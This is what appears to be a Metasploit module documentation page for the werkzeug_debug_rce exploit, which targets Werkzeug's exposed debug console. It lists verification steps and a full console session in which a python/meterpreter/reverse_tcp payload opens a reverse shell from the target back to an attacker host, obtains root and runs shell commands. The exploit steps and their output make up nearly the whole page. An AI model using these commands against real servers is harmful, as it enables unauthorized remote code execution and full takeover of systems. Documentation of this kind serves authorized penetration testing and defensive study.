2.0 KiB
2.0 KiB
Vulnerable Application
Verified against:
- 0.9.6 on Debian
- 0.9.6 on Centos
- 0.10 on Debian
A sample application which enables the console debugger is available here
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/werkzeug_debug_rce - Do:
set rport <port> - Do:
set rhost <ip> - Do:
check
[+] 10.108.106.201:8081 - The target is vulnerable.
- Do:
set payload python/meterpreter/reverse_tcp - Do:
set lhost <ip> - Do:
exploit - You should get a shell.
Options
TARGETURI
TARGETURI by default is /console, as defined by werkzeug, however it can be changed within the python script.
Scenarios
Example utilizing the previously mentioned sample app listed above.
msf > use exploit/multi/http/werkzeug_debug_rce
msf exploit(werkzeug_debug_rce) > set rport 8081
rport => 8081
msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
rhost => 10.108.106.201
msf exploit(werkzeug_debug_rce) > check
[+] 10.108.106.201:8081 - The target is vulnerable.
msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
lhost => 10.108.106.121
msf exploit(werkzeug_debug_rce) > exploit
[*] Started reverse handler on 10.108.106.121:4444
[*] Sending stage (25277 bytes) to 10.108.106.201
[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
meterpreter > getpid
Current pid: 13034
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : werkzeug
OS : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
Architecture : x86_64
Meterpreter : python/python
meterpreter > shell
Process 13037 created.
Channel 0 created.
/bin/sh: 0: can't access tty; job control turned off
# ls
app.py app.pyc werkzeug
# exit
meterpreter > exit
[*] Shutting down Meterpreter...